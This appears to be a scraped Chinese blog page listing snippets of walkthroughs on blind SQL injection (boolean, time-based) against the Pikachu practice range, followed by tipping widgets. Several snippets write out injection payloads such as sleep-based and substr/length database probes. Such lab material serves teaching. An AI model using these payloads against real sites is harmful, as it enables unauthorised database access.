pikachu~~~布尔,时间,宽字节盲注
weixin_50339832的博客
06-03 1453
基于boolian的盲注 屏蔽了报错信息,只显示两种情况:正确和错误 输入单引号试探f
pikachu盲注(布尔)
2301_79595769的博客
12-23 615
语法:mid(string, start[, length]) column_name为要提取字符的字段,start为开始截取位置(起始值是1),length为截取的长度(可选,默认余下所有字符)通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。(数据库中有的用户名)' and length((select database()))=(数字)--+char(x)函数:将x的值转为所对应的字符。
pikachu(时间盲注)
ANYOUZHEN的博客
05-11 1535
pikachu基于时间盲注 我们输入' 返回I don't care 我们输入anyouzhen sakura ,同样返回I don't care 我们可以利用sleep()函数进行判断,是否存在注入点 我们输入 kobe' and sleep(5)# 查看网络,发现雀食存在5s的延迟,说明后面闭合后的内容被带入到数据库中去了 所以可以说明存在注入点,这种注入方式被称为时间盲注 基于时间的延迟: kobe' and if((substr(database(),1,1))='p',sl
pikachu的盲注(base on time)
weixin_50339082的博客
06-14 1246
pikachu的盲注(base on time) 打开pikachu测试平台。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具(F12),控制台,选择网络。 输入 kobe’ and sleep(5)#,发现延迟5秒发送。 输入错误信息,发现sleep语句不执行 这样我们就可以写一个判断 kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)# 输入 kobe’ and if((subst
pikachu靶场通关sql注入盲注
12-27
对于Pikachu靶场中的SQL盲注挑战,可以采用基于布尔条件的时间延迟注入技术来逐步推断数据库结构和内容。具体实现方式如下: #### 使用sqlmap工具自动化测试 为了简化操作并提高效率,推荐先尝试使用`sqlmap`这款...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值